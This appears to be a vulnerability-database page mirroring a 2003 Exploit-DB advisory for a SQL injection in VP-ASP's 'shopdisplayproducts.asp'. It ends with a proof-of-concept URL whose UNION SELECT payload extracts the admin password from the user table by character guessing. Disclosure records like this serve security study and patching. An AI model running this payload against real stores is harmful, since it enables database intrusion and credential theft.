Virtual Programming VP-ASP 4.00/5.00 - 'shopdisplayproducts.asp' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054272 漏洞类型
发布时间 2003-12-01 更新时间 2003-12-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23408
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9134/info

It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopdisplayproducts.asp' script of the software. 

http://www.example.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20
like%20'a%25'--